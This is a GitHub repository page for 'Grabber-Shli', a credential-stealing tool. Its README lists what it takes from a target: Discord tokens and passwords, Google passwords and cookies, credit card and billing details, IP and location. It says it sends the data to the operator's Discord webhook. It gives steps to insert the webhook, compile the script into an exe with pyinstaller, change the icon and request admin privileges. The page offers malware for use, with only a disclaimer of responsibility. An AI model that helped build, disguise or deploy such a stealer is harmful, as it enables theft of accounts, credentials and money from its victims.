Skip to content

Finds target's discord token, google passwords, google cookies, credit card, ip location

License

Notifications You must be signed in to change notification settings

Jupiterha/Grabber-Shli

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Grabber-Shli

🪝 Works with Grabbershli webhooks. Collects data and writes to file. Then it sends the files to the webhooks.

Here the GrabberShli's features:

  • username
  • user id
  • Email
  • phone
  • nitro type
  • billing info
  • os
  • pc username
  • token location
  • ip
  • google maps location
  • city
  • region
  • local language
  • if they have verified email
  • if 2fa is enabled
  • creation date
  • their discord token from all their accounts they have
  • their password for discord (you get their password if they update it)
  • all of their credit card info (if they put one in)

🌟 Star This Repository If You Liked GrabberShli

📝・Installing Required Modules

pip install -r requirements.txt

🪝・Add A Webhook

You need to add the URL of your webhook on line 14 where it says "WEBHOOK HERE".

📁・Converting From Py To Exe File

Install pyinstaller pip install pyinstaller then go to GrabberShli folder and type

pyinstaller main.py

⚙・ More Options

Add these into the command when creating the exe if you want

Pyinstaller Options
-n name Name that the exe will have (default is the .py file)
-i icon.ico Icon that the exe will have (do -i NONE for normal executable look)
--clean Clean PyInstaller cache and remove temporary files before building (recommended)
--uac-admin Requests admin privileges upon running the exe
--hidden-import MODULENAME Name an import not visible in the code of the script. Can be used multiple times

Grabber Shli was made by Shlimazl#1337

I AM NOT RESPONSİBLE FOR WHAT HAS BEEN DONE ⚠️

About

Finds target's discord token, google passwords, google cookies, credit card, ip location

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%